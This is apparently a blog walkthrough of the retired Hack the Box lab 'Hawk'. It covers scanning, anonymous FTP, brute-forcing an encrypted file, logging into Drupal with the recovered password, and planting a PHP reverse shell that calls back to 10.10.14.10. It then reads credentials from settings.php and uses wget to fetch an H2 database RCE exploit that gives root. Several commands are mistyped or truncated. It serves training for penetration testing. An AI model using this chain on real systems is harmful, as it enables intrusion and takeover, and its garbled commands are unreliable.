Hack the Box: Hawk Walkthrough

Today we are going to solve another CTF challenge “HawkNew”. HawkNew is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Easy
Task: To find user.txt and root.txt
Note: Since these labs are online available therefore they have static IP. The IP of HawkNew is 10.10.10.102

Penetration Methodology:
§  Port scanning and IP discovery
§  Anonymous FTP Login
§  Checking file type
§  Getting Login Credentials
§  Browsing IP through port 80
§  Exploiting Drupal
§  Reading First Flag User.txt
§  Getting Login Credentials
§  Spawning TTY Shell
§  Searching exploit via Searchsploit
§  Getting root Access
§  Reading Final Flag Root.txt

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and running services.

nmap -A 10.10.10.102

The Nmap output shows various open ports: 21(ftp), 22(ssh), 80 http server (Drupal CMS), 8082(h2 database http console).



From the NMAP Scan output we saw that ftp Port 21 is Open and the next thing that catches our eyes is it so it has Anonymous login allowed.

ftp 10.10.10.102

We easily connected to ftp through Anonymous Login. Moving on, after navigating through multiple directories we found a hidden file i.e. “.drupal.txt.encand then we transferred the file to our local machine.



Since .drupa.txt.enc is encrypted. Let’s check the file type using ‘file’ command.

file.drupal.txt.enc

It came out to be openssl encoded data with salted password. Clearly we need to decrypt the file to get any further clue.




To crack this file, we have used an openssl bruteforce tool which is easily available on github. You can download it from the given below link or can run the following command for downloading and script execution.

git clonehttps://github.com/deltaclock/go-openssl-bruteforce.git
./openssl-brute --file /root/.drupal.txt.enc

Boom!! We have successfully cracked the file and the Password Hint we got is “PencilKeyboardScanner123 this could be the password for CMS Login. Let’s Check it.



As port 80 is running http server, we open the target machine’s IP address in our browser and found out it’s a Drupal Login Page. To Login this page we have used a Basic Username: admin and Password: PencilKeyboardScanner123.


Oh yeah!! We have successfully logged into admin dashboard. Now go to modules and then enable the check box for Path and PHP filter.





After that go to Content > Add Content > Basic Page to create a basic page where we can write malicious code to spawn the web shell. Just give any title for your malicious code.
Here we have written one-liner code for PHP reverse shell with the help of Pentest Monkey website.

&1|nc 10.10.14.10 1234 >/tmp/f"); ?>

Then select the Text format as “PHPCode”. Before saving it you should start netcat listener on the listening port. So, once the code is executed it will establish a reverse connection.
nc -lvp 1234




We got a reverse connection of victim’s machine on our netcat listener. To spawn the proper shell we have used python3 bin bash one liner.

python3 -c ‘import pty;pty.spawn(“/bin”bash”)’

Inside /home/denial we have got to User.txt flag, now time to find the root flag. While exploring through directories, we thought of reading the contents of the “settings.php” file, in this file we found the password: drupal4hawk
cat settings.php | grep Password


Then with the following command we switch the user and logging in as user daniel.
su daniel
Password: drupal4hawk
Here we have used Simple phyton3 commands to escape the python3 interpreter.
>>import pty
>>pty.spawn(‘/bin/bash’)


From Nmap scan output we notice that “H2 database running on port 8082”, therefore we search out for H2 database exploit in searchsploit.
searchsploit H2 database
It came out to be a Remote Code Execution. The exploit we have used is highlighted, after that we have copied the exploit 45506.py in the /root directory and run a Python server to download the file in the target machine.
searchsploit -m 45506
python -m SimpleHTTPServer 8080



Afterwards we have downloaded our exploit 45506.py in the /tmp directory of target machine. Then Grant the FULL permission to the exploit and execute it using command.
cd /tmp
wget http://10.10.14.10:8080/45506.py
chmod 777 455506.py
python3 45506.py –H 127.0.0.1:8082
id
Finally!! We have got the root access. Now let’s go and get the “root.txt”. We take a look at the content of the file and find our final flag.





Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

0 comments:

Post a Comment